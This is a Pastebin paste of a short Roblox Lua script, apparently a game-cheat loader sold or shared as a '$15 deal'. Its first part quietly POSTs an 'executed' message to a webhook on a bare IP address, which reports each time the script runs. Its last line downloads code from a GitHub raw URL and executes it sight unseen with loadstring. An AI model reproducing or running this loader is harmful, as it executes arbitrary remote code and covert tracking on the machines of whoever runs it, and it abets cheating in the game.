Egorikusa

gh 15$ deal

Jun 19th, 2025 (edited)
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. request(
  2. {
  3. Url = "http://89.169.3.53:8000/webhook/8d735596-41aa-4e0c-a31d-946147ab1ccb",
  4. Method = "POST",
  5. Body = game:GetService("HttpService"):JSONEncode(
  6. {
  7. content = "executed"
  8. }
  9. ),
  10. Headers = {
  11. ["Content-Type"] = "application/json"
  12. }
  13. }
  14. )
  15.  
  16. loadstring(game:HttpGet("https://raw.githubusercontent.com/MM2Nebula/MM2/refs/heads/main/script"))()
  17.  
Advertisement
Add Comment
Please, Sign In to add comment